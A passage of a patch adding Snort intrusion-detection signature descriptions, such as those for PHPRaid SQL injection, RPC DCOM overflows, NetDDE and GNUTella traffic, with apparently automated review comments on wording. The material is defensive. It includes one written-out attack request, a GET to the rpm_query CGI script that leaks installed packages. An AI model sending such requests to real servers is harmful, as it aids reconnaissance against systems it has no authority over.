+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS484
+
+TLSecurity
+http://www.tlsecurity.net/backdoor/Dagger.1.4.html (link appears to be 
+inactive)
+
+Dark-e
+http://www.dark-e.com/archive/trojans/dagger/140/index.shtml
+
+--
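Review bot: "HKEY_CLASSES_USER" in the Affected registry keys list is not a standard hive name; check whether HKEY_CURRENT_USER was intended, since the Run and RunServices keys listed under it are user-hive keys that pair with the HKEY_LOCAL_MACHINE entry given. "exceutable" should be "executable", and the Summary ("Dagger is a Trojan Horse.") does not say what the event means; the SID table in Detailed Information shows that 105 fires on the outgoing TCP connection, which belongs in the Summary.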
--- /dev/null
+++ b/doc/signatures/1763.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1763
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
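Review bot: "ona web server" in Detailed Information should be "on a web server". Nothing in the description identifies which CGI application or request pattern SID 1763 matches; Summary and Affected Systems ("All systems running CGI applications") are generic, so this document cannot be told apart from the other CGI rule descriptions. Name the script or content matched, and fill in Additional References.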
--- /dev/null
+++ b/doc/signatures/557.txt
@@ -0,0 +1,93 @@
+Rule:  
+
+--
+
+Sid:
+
+557
+
+--
+
+Summary:
+
+A network-internal server has authenticated an external GNUTella client
+connection attempt and they have begun communications.
+
+--
+
+Impact:
+
+Possible policy violation.
+
+--
+
+Detailed Information:
+
+GNUTella is a P2P (Peer-to-Peer) protocol for exchanging arbitrary
+files.  Depending on your site's policies, using it may be a policy
+violation.
+
+If not properly configured, GNUTella clients may accidentally share out
+confidential files.  GNUTella worms (which use deceptive names to
+encourage download) and viruses may also be accidentally downloaded by a
+client.
+
+This rule being triggered means that a GNUTella server has been detected
+on the protected network.
+
+--
+
+Affected Systems:
+
+Any system with a GNUTella server installed (available for most
+platforms)
+
+--
+
+Attack Scenarios:
+It is possible for an inside attack to take place by using peer-to-peer
+clients to transfer corporate data from an internal resource to an
+external third party.
+
+--
+
+Ease of Attack:
+Simple. This is peer-to-peer activity.
+
+--
+
+False Positives:
+
+This rule detects the term "GNUTELLA OK" on all ports.  As a result, any
+email, web page, or other network content that discusses the protocol
+and its messages will trigger this alert.
+
+--
+
+False Negatives:
+
+None known.
+
+--
+
+Corrective Action:
+
+Depends on acceptable use policies.
+
+--
+
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Gene R Gomez (gene!AT!gomezbrothers!DOT!com)
+
+-- 
+
+Additional References:
+
+GNUTella
+http://www.gnutella.com
+
+Gnutella Protocol
+http://rfc-gnutella.sourceforge.net/developer/testing/
+
+--
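Review bot: the Summary says an internal server "has authenticated" an external client, but False Positives states the rule only matches the string "GNUTELLA OK" on any port, so "accepted" describes what is actually observed better than "authenticated". Impact ("Possible policy violation") omits the accidental sharing of confidential files and the worm download risk that Detailed Information raises; mentioning them in Impact would help triage.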
--- /dev/null
+++ b/doc/signatures/1434.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1434
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
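Review bot: the description never states what SID 1434 looks for; Summary, Detailed Information and Affected Systems ("All systems using a web server") are all generic, so an analyst cannot tell which request or application this alert concerns. Add the matched content or target application, and a reference in Additional References.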
--- /dev/null
+++ b/doc/signatures/100000725.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000725
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "PHPRaid" application running on a webserver. Access to the file "view.php" with SQL commands being passed as the "raid_id" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "raid_id" parameter in the "view.php" script used by the "PHPRaid" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPRaid
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
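Review bot: the second Detailed Information paragraph is a comma splice ("...compromise the database backend for the application, the attacker may also..."); split it into two sentences. "ona web server" should be "on a web server", and the paragraph about credential validation does not describe SQL injection through "raid_id". Corrective Action only says to patch; validating "raid_id" as an identifier and using parameterized queries are the application-level mitigations worth naming alongside patching. The Sid, Affected Systems and Contributors sections also lack the blank line before "--".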
--- /dev/null
+++ b/doc/signatures/3253.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3253
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
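Review bot: Attack Scenarios ("a request for a file with an overly long filename via a network share") does not match the vulnerability described in Detailed Information (a malformed DCOM request over RPC causing a buffer overflow); rewrite the scenario in terms of the RPC request, or explain how the share request reaches the RPC interface. "Expoit" should be "Exploit", and Additional References is empty for a vendor-patched issue; link the vendor bulletin that Corrective Action relies on.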
--- /dev/null
+++ b/doc/signatures/1167.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+
+1167
+
+--
+Summary:
+
+This event is generated when an attempt is made to gain information on installed packages on OpenLINUX.
+
+--
+Impact:
+
+This is a serious information leak, since an attack could then attempt to determine and exploit any vulnerable packages.
+
+
+--
+Detailed Information:
+
+The OpenLinux CGI package comes with a script called rpm_query. A 
+vulnerability exists which will allow a remote user to list all
+packages/versions installed on the system. This information will be 
+useful for an attacker to further compromise a system.
+
+
+--
+Affected Systems:
+
+	OpenLinux Desktop 2.3        
+        OpenLinux eServer 2.3        
+
+--
+Attack Scenarios:
+
+GET http://target/cgi-bin/rpm_query HTTP/1.0
+
+--
+Ease of Attack:
+
+Simple.
+
+--
+False Positives:
+
+None known.
+
+--
+False Negatives:
+
+None known.
+
+--
+Corrective Action:
+
+Remove the package (/home/httpd/cgi-bin/rpm_query)   
+
+Upgrade to the latest version of OpenLinux (2.3-17 or later), 
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1036
+
+--
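Review bot: "since an attack could then attempt" in Impact should be "an attacker". The Affected Systems list mixes a tab on the first entry with spaces on the second, and both entries carry trailing whitespace; "Remove the package (/home/httpd/cgi-bin/rpm_query)" also has trailing spaces, and "Upgrade to the latest version of OpenLinux (2.3-17 or later)," ends in a comma instead of a full stop. Detailed Information calls rpm_query a script, so "Remove the script" is more accurate than "Remove the package".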
--- /dev/null
+++ b/doc/signatures/1726.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1726
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
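Review bot: The Impact line "Information gathering possible administrator access." in this hunk is missing a conjunction or punctuation; suggest "Information gathering, possible administrator access." The second Detailed Information paragraph is a comma splice ("...on the IIS implementation on the host, this may be the prelude to an attack..."); split it into two sentences. Additional References is left empty even though the Summary names a specific product; a vendor or Bugtraq reference would help analysts triage the event.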
--- /dev/null
+++ b/doc/signatures/1310.txt
@@ -0,0 +1,58 @@
+Rule:  
+--
+Sid:
+
+1310
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "FREE XXX".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "FREE XXX".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+--
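Review bot: The Summary line "This rule indicates that a webpage was visited the included the content "FREE XXX"." has a typo ("the included" should be "that included") and departs from the "This event is generated when..." phrasing used by the other signature documents. Minor style points: the Contributors line is missing a space before the e-mail address ("Steven Alexander<alexander.s@mccd.edu>"), the False Negatives section lacks the blank line before its "--" separator that the other sections have, and the "-- " separator before Additional References carries trailing whitespace.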
--- /dev/null
+++ b/doc/signatures/643.txt
@@ -0,0 +1,60 @@
+Rule: 
+
+--
+Sid: 643
+
+--
+Summary: 
+This event is generated when a buffer overflow attack is attempted against a target machine.
+
+--
+Impact: 
+Serious. The attacker may be able to gain remote access to the system or have the ability to execute arbitrary code with the privileges of a system user.
+
+
+-- 
+Detailed Information: 
+This rule tracks the bit combination which may occur in network packets aimed at overflowing HP-UX UNIX network services. The buffer overflow attack attempts to force the vulnerable application to execute  attacker-controlled code in order to gain interactive access or run arbitrary commands on the vulnerable system.
+
+--
+Attack Scenarios: 
+An attacker launches an overflow exploit against a vulnerable FTP server and gains the ability to start a shell session, thus obtaining interactive access to the target.
+
+--
+Ease of Attack: 
+Simple
+
+
+--
+False Positives: 
+This event may be generated by legitimate traffic to the specified port.
+
+
+-- 
+False Negatives: 
+This event is specific to the shell code defined in the rule.
+Other shell code sequences may not be detected.
+
+--
+Corrective Action: 
+Check the target host for other signs of compromise.
+
+Look for other events concerning the target host.
+
+Apply vendor supplied patches and keep the operating system up to date.
+
+--
+Contributors: 
+Original Rule Writer Unkown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS359
+
+--
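Review bot: This document has no Affected Systems section, although every other signature document in the patch carries one and Detailed Information specifically names "HP-UX UNIX network services"; add the section so readers can scope the event. Also "Original Rule Writer Unkown" under Contributors should read "Unknown", and "execute  attacker-controlled code" has a doubled space.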
--- /dev/null
+++ b/doc/signatures/3086.txt
@@ -0,0 +1,65 @@
+Rule: 
+
+--
+Sid: 
+3086
+
+-- 
+Summary: 
+This event is generated when an attempt is made to access the file
+spp_sta.stm on a 3com wireless router.
+
+-- 
+
+Impact: 
+Intelligence gathering activity.
+
+--
+Detailed Information:
+The 3Com ADSL wireless router 3CRADSL72 is prone to an authentication
+bypass issue that may allow a malicious third party to gain information
+on the device and the networks it serves. It may also be possible for an
+attacker to gain administrative privileges on the device.
+
+--
+Affected Systems:
+	3Com 3CRADSL72 ADSL wireless router
+
+--
+
+Attack Scenarios: 
+An attacker with access to the page can gain information on the networks
+being served by the router and use the knowledge gained in further
+attacks on the system. The attacker may also be able to gain
+administrative access to the router.
+
+-- 
+Ease of Attack: 
+Simple. No exploit software is required.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+The address of the router should be added to the $HTTP_SERVERS variable
+if the rule is used in the default form. Otherwise a $WIRELESS_ROUTERS
+variable could be used in both the snort.conf and the rule to eliminate
+any possible false positives.
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch.
+
+--
+Contributors: 
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
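Review bot: The False Negatives section here actually describes how to avoid false positives ("...could be used in both the snort.conf and the rule to eliminate any possible false positives."); either move that text to the False Positives section or rephrase it as a false-negative case (the rule will not fire if the router's address is not covered by $HTTP_SERVERS). The product name is written both "3com" (Summary) and "3Com" (Detailed Information, Affected Systems); use "3Com" consistently. Additional References is empty even though a specific device (3CRADSL72) and issue are named.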
--- /dev/null
+++ b/doc/signatures/3151.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid:
+3151
+
+-- 
+Summary: 
+This event is generated when an attempt is made to access the host
+filestem via fingerd.
+
+-- 
+Impact: 
+Information gathering.
+
+--
+Detailed Information:
+This event is generated when a specific attack against a vulnerable
+version of the finger daemon is detected. 
+
+The Finger daemon is used to provide information about users on a UNIX
+system. A certain version of fingerd shipped with one release of FreeBSD
+4.1.1 contained an added feature that allows a remote user to request
+some files via the use of finger. This event indicates that such a
+request has been made.
+
+The feature also allowed any file or directory structure on the host
+readable by the "nobody" user to also be accessed, leading to
+unauthorized information disclosure.
+
+--
+Affected Systems:
+	FreeBSD 4.1.1 Release
+
+--
+Attack Scenarios:  
+An attacker can use finger to read a directory structure or file by
+making a request via finger.
+
+-- 
+Ease of Attack: 
+Simple, no exploit software is required, just a specially formatted
+finger query.
+
+-- 
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+Corrective Action: 
+Disable the finger daemon or limit the addresses that can access the
+service via a firewall or TCP wrappers.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
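Review bot: The Summary line "filestem via fingerd" contains a typo; it should read "filesystem". In Detailed Information, "The Finger daemon" should be lower-case "finger" for consistency with "fingerd" and "finger" elsewhere in the text, and "A certain version of fingerd shipped with one release of FreeBSD 4.1.1" is redundant since Affected Systems already pins it to "FreeBSD 4.1.1 Release"; simplify to "The fingerd shipped with FreeBSD 4.1.1". Additional References is empty for a vendor-specific issue that should have a reference.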
--- /dev/null
+++ b/doc/signatures/2960.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2960
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
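Review bot: Two lines are missing their terminating full stop: the Impact line "Serious. Execution of arbitrary code with system level privileges" and the Corrective Action line "Apply the appropriate vendor supplied patches". Since Detailed Information notes the service "is not started by default", the Corrective Action could also say to verify the service is disabled rather than only "Disable the NetDDE service." so readers check their current state.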
--- /dev/null
+++ b/doc/signatures/2368.txt
@@ -0,0 +1,59 @@
+Rule:  
+
+--
+Sid:
+2368
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application PhpGedView.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+PhpGedView contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating the PGV_BASE_DIRECTORY
+parameter when making a GET or POST  request to a vulnerable system.
+
+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root.
+
+--
+Affected Systems:
+	PhpGedView 2.65.1 and earlier
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and define their
+own path to the PGV_BASE_DIRECTORY variable.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
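Review bot: The statement in Detailed Information that the code runs "with the privileges of the user running the webserver, usually root" is inaccurate; web servers normally run as an unprivileged account (for example www-data or nobody) after startup, so suggest "usually an unprivileged web server account". Style points: "GET or POST  request" has a doubled space, the Affected Systems entry "PhpGedView 2.65.1 and earlier" lacks the blank line before its "--" separator that the other sections use, and Additional References is empty even though a specific product and version are named.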
--- /dev/null
+++ b/doc/signatures/1217.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1217
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
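Review bot: The Impact line "Possible execution of arbitrary code of the attackers choosing" needs a possessive apostrophe ("attacker's choosing"). Several lines in the Summary, Impact and Detailed Information sections carry trailing whitespace ("...exploit a known ", "...arbitrary code of ", "...exist for each implementation and the ", "...the victim server and "), which should be stripped before commit. Additional References is empty.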
--- /dev/null
+++ b/doc/signatures/1567.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1567
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
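Review bot: As with the other IIS documents in this patch, the Impact line "Information gathering possible administrator access." is missing a conjunction or comma, and the Detailed Information sentence "The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack..." is a comma splice that should be two sentences. Additional References is empty.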
--- /dev/null
+++ b/doc/signatures/3431.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3431
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
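Review bot: The Attack Scenarios text ("An attacker may make a request for a file with an overly long filename via a network share.") does not match the vulnerability described in Detailed Information, which is a malformed RPC DCOM request sent to an RPC port; the scenario should describe the malformed RPC request instead. Typo in Ease of Attack: "Expoit code exists." should be "Exploit code exists." Additional References is empty although the document describes a specific, patched Microsoft RPC DCOM vulnerability.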
--- /dev/null
+++ b/doc/signatures/100000731.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000731
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Geeklog" application running on a webserver. Access to the file "DeleteComment.Action.class.php" using a remote file being passed as the "$_CONF[path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "$_CONF[path]" parameter in the "DeleteComment.Action.class.php" script used by the "Geeklog" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Geeklog
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
